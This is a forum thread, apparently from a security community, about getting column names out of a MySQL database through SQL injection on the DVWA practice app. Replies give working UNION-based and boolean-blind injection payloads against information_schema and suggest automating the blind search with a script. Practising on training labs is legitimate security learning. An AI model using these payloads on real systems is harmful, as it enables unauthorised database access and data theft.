How to drag column names up from mySQL? – Digitalmunition




Home Forums How to drag column names up from mySQL?

This topic contains 1 reply, has 2 voices, and was last updated by  einfallstoll 1 month, 2 weeks ago.

  • Author
    Posts
  • #255317

    anonymous
    Participant

    My payload: 6′ UNION (SELECT ?, ? FROM information_schema.columns WHERE COLUMN_NAME = ‘users’)–
    I am doing SQL injection on DVWA, and I am wondering if there is a way to pull out column names from a table. Or is it a guessing game?

  • #255318

    einfallstoll

    The information_schema columns table is public information and you can find all valid column names in the MySQL documentation.

    “`
    6′ UNION (SELECT TABLE_NAME, COLUMN_NAME FROM information_schema.columns)–
    “`

  • #255319

    [deleted]

    [deleted]

  • #255320

    VampireFluf

    With this stackoverflow question you can find your answer: [https://stackoverflow.com/questions/193780/how-to-find-all-the-tables-in-mysql-with-specific-column-names-in-them](https://stackoverflow.com/questions/193780/how-to-find-all-the-tables-in-mysql-with-specific-column-names-in-them)

  • #255321

    musicin3d

    I haven’t played with DVWA, but I’ll share something I’ve enjoyed doing…

    Sometimes your SQL injection doesn’t return data, but you can tell if it was successful or not. For example, the vulnerable page might be loading products. If you inject a condition that evaluates to false then the page will show no products (or it might just crash). Using that you can inject something like `and exists(select * from information_schema.columns where column_name = ‘password’)` and see if they are storing passwords anywhere in the database.

    The fun happens when you combine this true/false test with binary search and `char(x)` to perform a bruteforce search for column and table names. Write a script and let it run all day. XD

    `and exists(select * from information_schema.columns where length(column_name) = 8 and column_name like = concat(‘pass’, char(110), ‘%’)`

    `and exists(select * from information_schema.columns where length(column_name) = 8 and column_name like = concat(‘pass’, char(116), ‘%’)`

    `and exists(select * from information_schema.columns where length(column_name) = 8 and column_name like = concat(‘pass’, char(120), ‘%’)`

You must be logged in to reply to this topic.